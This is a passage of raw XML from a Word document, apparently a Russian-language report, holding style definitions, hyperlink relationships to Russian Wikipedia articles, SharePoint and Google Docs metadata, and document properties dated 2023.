      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="32"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="005E4F2A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:before="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="284" w:hanging="284"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="993"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="851" w:hanging="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1843"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1843" w:hanging="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="33"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="31"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="004B37E8"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="12">
    <w:name w:val="Светлая заливка1"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="60"/>
    <w:locked/>
    <w:rsid w:val="004B37E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20">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="59"/>
    <w:locked/>
    <w:rsid w:val="00475C3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1">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a6"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C5031D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af4">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C5031D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Список_ТИРЕ"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af6">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="af5"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="af6"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23">
    <w:name w:val="Список_2_уровня"/>
    <w:basedOn w:val="af6"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af8">
    <w:name w:val="Список источников"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="header"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afa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afa">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afb">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afc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afc">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="afb"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afe">
    <w:name w:val="_Название рисунка"/>
    <w:basedOn w:val="aff"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="_Рисунок"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="24">
    <w:name w:val="_Маркированный2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00917645"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="caption"/>
    <w:aliases w:val="Вставленный объект"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="aff1"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="0091764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aff2">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="Название объекта Знак"/>
    <w:aliases w:val="Вставленный объект Знак"/>
    <w:link w:val="aff"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Основной текст Знак1"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff3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character" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="Основной текст + Курсив"/>
    <w:aliases w:val="Интервал 0 pt15"/>
    <w:basedOn w:val="13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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff3">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="223" w:lineRule="exact"/>
      <w:ind w:hanging="2140"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff6">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff7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aff7">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1pt">
    <w:name w:val="Основной текст + Интервал 1 pt"/>
    <w:basedOn w:val="13"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:cs="MS Mincho"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="Основной текст (6)"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="61"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="248" w:lineRule="exact"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsiTheme="minorHAnsi" w:cs="MS Mincho"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff8">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:aliases w:val="Интервал 0 pt11"/>
    <w:basedOn w:val="aff6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u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff9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a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4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2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2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99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3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5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5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48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4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9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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/API" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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ru.wikipedia.org/wiki/%D0%90%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9_%D1%8F%D0%B7%D1%8B%D0%BA" TargetMode="External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ru.wikipedia.org/wiki/%D0%90%D0%B1%D1%81%D1%82%D1%80%D0%B0%D0%BA%D1%86%D0%B8%D1%8F" TargetMode="External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F0421F9B4619547806EAC03C00BBFDB" ma:contentTypeVersion="2" ma:contentTypeDescription="Создание документа." ma:contentTypeScope="" ma:versionID="8b773473799bce78b751a709e780e6f8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="e9a4f99e-c71d-409a-aac1-dc0df05626eb" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="eb260f9df89526e6e47cc9ca4d0b9558" ns2:_="">
    <xsd:import namespace="e9a4f99e-c71d-409a-aac1-dc0df05626e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9a4f99e-c71d-409a-aac1-dc0df05626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ftcMt3K7Hn0shcjoDuafXydPbQ==">AMUW2mX9Oecyvqru5tMgUlhaAo1sKAckq9fsXN/h8gEeyLE6y90aQJ8wCuCn3iqe9vvwL1D8/PZFz9dBh+sMq0PUzMujMo8dnJ+ZuM4UfsQmKMMfi/ZuZWbWsYlr46nZYtDwFLKV4uGe</go:docsCustomData>
</go:gDocsCustomXmlDataStorage>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0E6D3F52-9A72-482E-8417-513C1A13BB4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C6F4349-4401-4BBB-AB04-AED20DCD8AF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E04409-578A-47C2-BF90-C687296988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9a4f99e-c71d-409a-aac1-dc0df05626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13</Pages>
  <Words>2143</Words>
  <Characters>12217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14332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Алена Федорова</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Алена Федорова</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-31T09:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-13T11:17:00Z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0x010100DF0421F9B4619547806EAC03C00BBFDB</vt:lpwstr>
  </property>
</Properties>
</file>